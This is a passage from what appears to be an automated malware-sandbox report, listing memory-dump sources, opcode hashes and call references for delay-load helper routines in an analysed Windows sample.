              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 1ae2e0522820bf9c99a4b97f9d5ef9c30252b8f704c11dbace70372c17556d7c
              • Instruction ID: 37dc27b2306fc5a125f6af8b283d17207def0b820409328e0c24d4d8daa305fb
              • Opcode Fuzzy Hash: 1ae2e0522820bf9c99a4b97f9d5ef9c30252b8f704c11dbace70372c17556d7c
              • Instruction Fuzzy Hash: 32B012D6B7C302AE310CB1187C02D76122DC4D4B20330451BB10AD0150DA809C088131
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6DC36
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 6abecdb4f42c48e763ee222dfd7f15ab7abc85fa0f79c406039467855375ea00
              • Instruction ID: 5d621755976eea8dea977047bacc683da84eeebf548696e5ffcce3841342243f
              • Opcode Fuzzy Hash: 6abecdb4f42c48e763ee222dfd7f15ab7abc85fa0f79c406039467855375ea00
              • Instruction Fuzzy Hash: 0AB012D6B6C306BE310D71147E02C76122EC5D4B203314A1BB106E0050DA809C489031
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: b93425c219d0552163325a6608d3bf8abeb599e8bfeb8b9758bb16f734293711
              • Instruction ID: 5f73c5cbcd526a806473baaa828b9b3dc824ab9ca89b027a2af4bc42ca52db77
              • Opcode Fuzzy Hash: b93425c219d0552163325a6608d3bf8abeb599e8bfeb8b9758bb16f734293711
              • Instruction Fuzzy Hash: BEA012D1B6C0037D300831007C16C36130DC8D0B20330440AB047940C1D84058084430
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 7557d9b3568e2a2679378428b2405fd65f6bb3524e9135a46bc310aab835a176
              • Instruction ID: 5f73c5cbcd526a806473baaa828b9b3dc824ab9ca89b027a2af4bc42ca52db77
              • Opcode Fuzzy Hash: 7557d9b3568e2a2679378428b2405fd65f6bb3524e9135a46bc310aab835a176
              • Instruction Fuzzy Hash: BEA012D1B6C0037D300831007C16C36130DC8D0B20330440AB047940C1D84058084430
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 013a99a552b21a099609d5644394330d42a49ad3d07371c1bd3724a32b01f3cf
              • Instruction ID: 5f73c5cbcd526a806473baaa828b9b3dc824ab9ca89b027a2af4bc42ca52db77
              • Opcode Fuzzy Hash: 013a99a552b21a099609d5644394330d42a49ad3d07371c1bd3724a32b01f3cf
              • Instruction Fuzzy Hash: BEA012D1B6C0037D300831007C16C36130DC8D0B20330440AB047940C1D84058084430
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: b41f7111c08b3eb622295bed60cf1b80f616ca799e810d393339cc6fddfa6195
              • Instruction ID: 5f73c5cbcd526a806473baaa828b9b3dc824ab9ca89b027a2af4bc42ca52db77
              • Opcode Fuzzy Hash: b41f7111c08b3eb622295bed60cf1b80f616ca799e810d393339cc6fddfa6195
              • Instruction Fuzzy Hash: BEA012D1B6C0037D300831007C16C36130DC8D0B20330440AB047940C1D84058084430
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 8053e43ac61e74718756c937b166f629d7026ae7bcbd554fc725b461d55de577
              • Instruction ID: 5f73c5cbcd526a806473baaa828b9b3dc824ab9ca89b027a2af4bc42ca52db77
              • Opcode Fuzzy Hash: 8053e43ac61e74718756c937b166f629d7026ae7bcbd554fc725b461d55de577
              • Instruction Fuzzy Hash: BEA012D1B6C0037D300831007C16C36130DC8D0B20330440AB047940C1D84058084430
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 2af2d6d0d9699c8223723861ccd3cf0dc1ec72e885542d0466a73f6c9edb1d67
              • Instruction ID: 5f73c5cbcd526a806473baaa828b9b3dc824ab9ca89b027a2af4bc42ca52db77
              • Opcode Fuzzy Hash: 2af2d6d0d9699c8223723861ccd3cf0dc1ec72e885542d0466a73f6c9edb1d67
              • Instruction Fuzzy Hash: BEA012D1B6C0037D300831007C16C36130DC8D0B20330440AB047940C1D84058084430
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 5a1678f8c87465d6e9fc6b26e09d03b747584115a387a9015b1e226455f2b6ea
              • Instruction ID: 5f73c5cbcd526a806473baaa828b9b3dc824ab9ca89b027a2af4bc42ca52db77
              • Opcode Fuzzy Hash: 5a1678f8c87465d6e9fc6b26e09d03b747584115a387a9015b1e226455f2b6ea
              • Instruction Fuzzy Hash: BEA012D1B6C0037D300831007C16C36130DC8D0B20330440AB047940C1D84058084430
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 2c33a8fcb3f5c66c1d7e3ef9ea4ed60e612c63010b18e70bab09d6a1005f853f
              • Instruction ID: 5f73c5cbcd526a806473baaa828b9b3dc824ab9ca89b027a2af4bc42ca52db77
              • Opcode Fuzzy Hash: 2c33a8fcb3f5c66c1d7e3ef9ea4ed60e612c63010b18e70bab09d6a1005f853f
              • Instruction Fuzzy Hash: BEA012D1B6C0037D300831007C16C36130DC8D0B20330440AB047940C1D84058084430
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 3f8e62a1caf93e2a7eb1ac4baae64a302c5d06fd2a652d9161ebc348e68c6b82
              • Instruction ID: 5f73c5cbcd526a806473baaa828b9b3dc824ab9ca89b027a2af4bc42ca52db77
              • Opcode Fuzzy Hash: 3f8e62a1caf93e2a7eb1ac4baae64a302c5d06fd2a652d9161ebc348e68c6b82
              • Instruction Fuzzy Hash: BEA012D1B6C0037D300831007C16C36130DC8D0B20330440AB047940C1D84058084430
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 02bca6b7d8ff0a0b649fcebb8a6f2b21ef04dc5c3735fc9171dacecee65218c8
              • Instruction ID: 5f73c5cbcd526a806473baaa828b9b3dc824ab9ca89b027a2af4bc42ca52db77
              • Opcode Fuzzy Hash: 02bca6b7d8ff0a0b649fcebb8a6f2b21ef04dc5c3735fc9171dacecee65218c8
              • Instruction Fuzzy Hash: BEA012D1B6C0037D300831007C16C36130DC8D0B20330440AB047940C1D84058084430
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 8d4c684070fd060141c98e3a8d3a55ef4d880ab5c7a8f07fbf482b429e44e820
              • Instruction ID: 5f73c5cbcd526a806473baaa828b9b3dc824ab9ca89b027a2af4bc42ca52db77
              • Opcode Fuzzy Hash: 8d4c684070fd060141c98e3a8d3a55ef4d880ab5c7a8f07fbf482b429e44e820
              • Instruction Fuzzy Hash: BEA012D1B6C0037D300831007C16C36130DC8D0B20330440AB047940C1D84058084430
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6DAB2
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: a17b8633424830625a445a358775ae591682739364983ebd8b9be42f3c488617
              • Instruction ID: 7a9693e0ef4fdafd650137faa1da5c208e7009b6fd3c652aafa3eeb6730ad089
              • Opcode Fuzzy Hash: a17b8633424830625a445a358775ae591682739364983ebd8b9be42f3c488617
              • Instruction Fuzzy Hash: 57A001E6BAD143BE31087292BD16D3A225EC8E4B613348A1BB44B9408AE99898495931
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6DAB2
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 03093891cb050dcd0791aa9e4057fa2b63c2bedb37707dd1fac05a51709deb36
              • Instruction ID: 7a9693e0ef4fdafd650137faa1da5c208e7009b6fd3c652aafa3eeb6730ad089
              • Opcode Fuzzy Hash: 03093891cb050dcd0791aa9e4057fa2b63c2bedb37707dd1fac05a51709deb36
              • Instruction Fuzzy Hash: 57A001E6BAD143BE31087292BD16D3A225EC8E4B613348A1BB44B9408AE99898495931
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6DAB2
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
